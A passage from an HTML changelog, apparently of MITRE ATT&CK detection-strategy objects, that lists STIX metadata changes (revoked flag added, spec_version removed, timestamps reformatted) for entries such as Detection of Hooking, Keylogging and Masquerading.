15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0719] Detection of Hooking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0687] Detection of Impair Defenses</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0662] Detection of Impersonate SS7 Nodes</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0651] Detection of Indicator Removal on Host</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0718] Detection of Ingress Tool Transfer</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0705] Detection of Input Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0612] Detection of Input Injection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0708] Detection of Internet Connection Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0664] Detection of Keychain</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0661] Detection of Keylogging</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0716] Detection of Linked Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0675] Detection of Location Tracking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0645] Detection of Lockscreen Bypass</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0715] Detection of Masquerading</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0609] Detection of Match Legitimate Name or Location</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0717] Detection of Native API</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New 